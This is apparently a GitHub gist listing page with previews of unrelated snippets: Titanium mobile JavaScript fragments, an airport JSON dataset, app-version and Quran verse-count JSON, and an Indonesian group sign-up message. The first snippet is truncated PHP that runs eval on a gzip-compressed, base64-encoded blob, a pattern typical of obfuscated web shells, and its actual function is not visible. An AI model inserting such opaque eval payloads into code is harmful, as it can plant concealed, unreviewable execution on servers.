This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<?php eval(gzinflate(base64_decode('tVdtc5tIEv6sVO1/GKsoAzYGhN4tYye10e2m7hLnZHn3g62oEAwSDgIyIL+cpf9+3TODJMvypuqulrLFMN3T3dMvT89EIdEOAhpGCQ00NWTzj7mq68+/vKuIyXKOGDW9B7PwFy4Sv4jShABlHMREUxYs1gmuqUQgrqSP6WOUF7mm+kAfR0lUgGTBVlH8GXHJmiBE9DiJT+a0SDOY9mcG+fV68K/Lr8PxoD+8HnwZDj58ufpHf2CQmlygpIuiFEYfqU9wmaShPYLAWJJyAjlwXWLrRC4LvTinW5r9OM3plogVocBAniX7+zCK6XhKi7GfJgVNYH/C9hUyM1osWEIKFs01XMBFrPa4zWe4uyjhnq4oUezmBYtpwud6SuqqKtcepgxsiUCx3SPwPoOfGEfHx7gD0wX+GyUakW9EPRJLpA1K+pZuMN73/BnVlGKeBREzlDhKvhuKPy+iOTWUgMZuwRZU2haCcslpqlZO83ysmvOgqWWMTseMZrHnQ5pY32ZFkZ3eWrfWzbdba3RsqQZR4Z9L14Uzo1A74A6UqaGEOlkuCerVdHJCkMat4JRz0rLJEZGG6ShAZk8Q+67IPk2IL6OtcZLr8qiKDfBp2JMuPirvFwkuQQ1iVQUDXBKLdOHPNjQeVc5A+GgjUQkzng5phlELDfVB1g0+4QOLCtxEZmyFG0wDP5CQpxgSSwNWqOC5DBywiWwS2lciCv4bySctlYvh29cvNirh61Sk0r5MiPJJirXn6bJ4NXRn5kaZE6fJVFPGV/3BH/3BjTrof74c9scfPn4cqCNdP7N1ZDx2G0630W21nW6rxx2ksBzs9BjznjTxW2/Vu81Gt9usG3zY7NQajm4IYs3udO2m02rXDT5s2Z3WhlhzYEXTsWuGGHZB2ZroAL/TcuyuwYcNp9m1dUP6X6puAqlRa4B0Pmw3nHpnI71W73ZskGmIYdN2NqqdRrdtN2HS4MN2rVnbrARBXYeLFcNm |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
// di login.js ganti baris yang ini: | |
var udid = Titanium.Platform.id; | |
// ganti dengan ini: | |
var udid = db_user.getVal("udid"); | |
if (!udid){ | |
udid = Titanium.Platform.id; | |
var label_udid = Ti.UI.createLabel({ |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
var win = Ti.UI.createWindow(); // | |
win.open(); | |
/// <<< Register & UnRegister Event Listeners | |
/** | |
* params: {event: 'event', callback: eventCallback} | |
*/ | |
function registerEventListener(obj, params) { | |
if ( typeof obj._eventListeners == 'undefined' ) { |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
$.bar.addEventListener("load",function(e){ // because the image in $.bar is remote | |
// check orientasi | |
var h = $.bar.rect.height, w = $.bar.rect.width, a = w/h; | |
var ch = $.foo.rect.height, cw = $.foo.rect.width, ac = cw/ch; // container | |
if(a > ac){ | |
$.foo.contentHeight = "100%"; | |
$.bar.left = (w - cw)/2*-1; | |
} else if(a < ac){ | |
$.foo.contentWidth = "100%"; | |
$.bar.top = ((cw/a)-ch)/2*-1; |
This file has been truncated, but you can view the full file.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
[ | |
{ | |
"icao": "19AK", | |
"iata": "ICY", | |
"name": "Icy Bay Airport", | |
"city": "Icy Bay", | |
"country": "US", | |
"elevation": 50, | |
"lat": 59.96900177, | |
"lon": -141.662002563, |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
{ | |
"version_name": "2.0.0", | |
"latest_build": 12, | |
"app_active": true, | |
"must_update": true, | |
"message": "Harap update" | |
} |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
{ | |
"last_modified":"1516089167.500978", | |
"ayahCount":[ | |
7, | |
286, | |
200, | |
176, | |
120, | |
165, | |
206, |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
{"message": "Saat ini TLN hanya terbuka untuk mereka yang sudah bergabung di grup TLN. Silahkan mendaftar lewat link ini http://bit.ly/WAG-TLN \nData anda tidak akan diproses sebelum anda terdaftar di grup ini. Tidak dipungut biaya."} |
OlderNewer